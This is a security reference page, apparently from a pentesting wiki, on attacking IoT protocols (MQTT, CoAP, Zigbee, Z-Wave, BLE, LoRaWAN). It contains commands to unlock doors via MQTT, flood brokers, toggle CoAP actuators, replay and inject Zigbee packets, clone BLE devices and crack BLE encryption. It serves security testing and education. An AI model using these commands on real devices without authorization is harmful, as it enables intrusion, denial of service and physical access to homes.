IoT Protocols

Security testing for IoT communication protocols - MQTT, CoAP, Zigbee, Z-Wave, BLE, and LoRaWAN.

Skill Level: Advanced Prerequisites: Networking, RF basics, embedded systems

MQTT (Message Queuing Telemetry Transport)

Overview

- Port: 1883 (plain), 8883 (TLS)
- Publish/Subscribe model
- Used in: Smart home, ICS/SCADA, sensors
- Broker-based architecture

Discovery

# Scan for MQTT brokers
nmap -p 1883,8883 --script mqtt-subscribe target.com

# Shodan
shodan search "port:1883 mqtt"

# Check for anonymous access
mosquitto_sub -h target.com -t '#' -v

# Expected output (if vulnerable):
# home/sensors/temperature 23.5
# home/door/status locked
# devices/camera/feed [binary data]

Enumeration

# Subscribe to all topics (wildcard)
mosquitto_sub -h target.com -t '#' -v

# Subscribe to specific level
mosquitto_sub -h target.com -t '+/+/status' -v

# With credentials (if known)
mosquitto_sub -h target.com -u admin -P password -t '#' -v

# List topics via $SYS
mosquitto_sub -h target.com -t '$SYS/#' -v

Attacks

# Publish malicious message
mosquitto_pub -h target.com -t 'home/door/command' -m 'unlock'

# Denial of Service (flood)
while true; do mosquitto_pub -h target.com -t 'test' -m 'flood'; done

# Intercept and modify (MITM)
# Use mitmproxy or custom broker

Tools

# MQTT Explorer (GUI)
https://mqtt-explorer.com/

# mqtt-pwn
https://github.com/akamai-threat-research/mqtt-pwn
python mqtt_pwn.py -b target.com -p 1883

# MQTT-CLI
mqtt sub -h target.com -t '#'

CoAP (Constrained Application Protocol)

Overview

- Port: 5683 (UDP), 5684 (DTLS)
- REST-like for constrained devices
- Used in: Sensors, smart meters, M2M

Discovery

# Scan for CoAP
nmap -sU -p 5683,5684 target.com

# Shodan
shodan search "port:5683"

Enumeration

# CoAP client
pip install aiocoap

# Discover resources
coap-client -m get coap://target.com/.well-known/core

# Expected output:
# </sensors>;rt="temperature",</actuators>;rt="switch"

# Get resource
coap-client -m get coap://target.com/sensors/temp

Attacks

# Modify resource (if writable)
coap-client -m put coap://target.com/actuators/switch -e "on"

# Amplification attack (DDoS)
# CoAP can be used for amplification due to UDP

Zigbee

Overview

- Frequency: 2.4 GHz (worldwide), 868 MHz (EU), 915 MHz (US)
- Range: 10-100m
- Used in: Smart home, lighting, sensors
- Network types: Star, Tree, Mesh

Hardware Requirements

- CC2531 USB dongle ($10-15)
- HackRF One
- YARD Stick One
- Ubertooth (can sniff 2.4 GHz)

Sniffing

# With Wireshark + CC2531
# Flash CC2531 with sniffer firmware

# Using KillerBee
killerbee zbstumbler  # Find networks
killerbee zbdump -c 11 -w capture.pcap  # Capture channel 11

# Using Zigbee2MQTT (for analysis)

Attacks

# KillerBee toolkit
# https://github.com/riverloopsec/killerbee

# Replay attack
zbdump -c 11 -w capture.pcap
zbreplay -c 11 -r capture.pcap

# Key extraction (if default key)
# Default Trust Center Link Key: 5A:69:67:42:65:65:41:6C:6C:69:61:6E:63:65:30:39

# Inject packets
zbgoodfind -c 11 -f capture.pcap  # Find key
zbinject -c 11 -p [packet]  # Inject

Security Issues

- Default/weak link keys
- No replay protection (some implementations)
- Insecure rejoin process
- OTA update vulnerabilities

Z-Wave

Overview

- Frequency: 908.42 MHz (US), 868.42 MHz (EU)
- Range: 30-100m
- Used in: Smart locks, thermostats, sensors
- Proprietary but reverse-engineered

Hardware

- Z-Wave.Me UZB stick
- RTL-SDR (limited)
- HackRF One

Attacks

# Z-Wave uses S0, S1, S2 security
# S0 has known vulnerabilities (key exchange flaw)

# EZ-Wave tool
# https://github.com/cureHsu/EZ-Wave
python ez-wave.py --interface /dev/ttyACM0

# Scapy-radio
# https://github.com/BastilleResearch/scapy-radio

S0 Key Extraction

1. Force device into inclusion mode
2. Sniff inclusion process
3. S0 key is XORed with known constant
4. Derive network key

BLE (Bluetooth Low Energy)

Overview

- Frequency: 2.4 GHz
- Range: ~100m
- Used in: Fitness trackers, locks, beacons

Scanning

# hcitool (deprecated but functional)
hcitool lescan

# Expected output:
# AA:BB:CC:DD:EE:FF Device Name
# 11:22:33:44:55:66 (unknown)

# bluetoothctl
bluetoothctl
[bluetooth]# scan on

# bettercap
bettercap -eval "ble.recon on"

Enumeration

# Connect and enumerate services
gatttool -b AA:BB:CC:DD:EE:FF -I
[AA:BB:CC:DD:EE:FF][LE]> connect
[AA:BB:CC:DD:EE:FF][LE]> primary
# Lists services

[AA:BB:CC:DD:EE:FF][LE]> characteristics
# Lists characteristics

[AA:BB:CC:DD:EE:FF][LE]> char-read-hnd 0x0016
# Read characteristic value

Attacks

# GATT attacks with gattacker
# https://github.com/securing/gattacker
node scan.js
node advertise.js -a config.json  # Clone device

# BLE spoofing with bettercap
bettercap
ble.recon on
ble.enum AA:BB:CC:DD:EE:FF
ble.write AA:BB:CC:DD:EE:FF 0x0016 01  # Write to characteristic

# Crackle - Crack BLE encryption
# https://github.com/mikeryan/crackle
crackle -i capture.pcap -o decrypted.pcap

Common Vulnerabilities

- Static/weak pairing keys
- Lack of encryption
- MITM during pairing
- Replay attacks
- Unauthorized characteristic access

LoRaWAN

Overview

- Frequency: 868 MHz (EU), 915 MHz (US), 433 MHz (Asia)
- Range: 2-15 km
- Used in: Smart cities, agriculture, utilities

Hardware

- RTL-SDR + LoRa receiver
- HackRF One
- Dedicated LoRa gateway

Security Architecture

- AppKey: Application key (shared secret)
- NwkSKey: Network session key
- AppSKey: Application session key
- DevAddr: Device address

Encryption: AES-128

Attacks

# LoRa traffic analysis
# https://github.com/rpp0/gr-lora

# Replay attacks (if no frame counter)
# ACK spoofing
# Bit-flipping attacks (if no integrity check)

# Join request replay
# If DevNonce not checked, can replay join requests

General IoT Testing Tools

# Firmware analysis
binwalk -e firmware.bin
firmware-mod-kit

# Protocol analysis
Wireshark + dissectors
scapy (custom protocol parsing)

# Radio
GNU Radio
Universal Radio Hacker (URH)
SDR# / GQRX

Wireless Testing - WiFi, general wireless
Hardware Hacking - Physical device testing
Network Scanning - Network discovery

PreviousPurple Team NextAutomotive Security

Last updated 8 days ago

Was this helpful?

hashtagMQTT (Message Queuing Telemetry Transport)

hashtagOverview

hashtagDiscovery

hashtagEnumeration

hashtagAttacks

hashtagTools

hashtagCoAP (Constrained Application Protocol)

hashtagOverview

hashtagDiscovery

hashtagEnumeration

hashtagAttacks

hashtagZigbee

hashtagOverview

hashtagHardware Requirements

hashtagSniffing

hashtagAttacks

hashtagSecurity Issues

hashtagZ-Wave

hashtagOverview

hashtagHardware

hashtagAttacks

hashtagS0 Key Extraction

hashtagBLE (Bluetooth Low Energy)

hashtagOverview

hashtagScanning

hashtagEnumeration

hashtagAttacks

hashtagCommon Vulnerabilities

hashtagLoRaWAN

hashtagOverview

hashtagHardware

hashtagSecurity Architecture

hashtagAttacks

hashtagGeneral IoT Testing Tools

hashtagRelated Topics

MQTT (Message Queuing Telemetry Transport)

Overview

Discovery

Enumeration

Attacks

Tools

CoAP (Constrained Application Protocol)

Overview

Discovery

Enumeration

Attacks

Zigbee

Overview

Hardware Requirements

Sniffing

Attacks

Security Issues

Z-Wave

Overview

Hardware

Attacks

S0 Key Extraction

BLE (Bluetooth Low Energy)

Overview

Scanning

Enumeration

Attacks

Common Vulnerabilities

LoRaWAN

Overview

Hardware

Security Architecture

Attacks

General IoT Testing Tools

Related Topics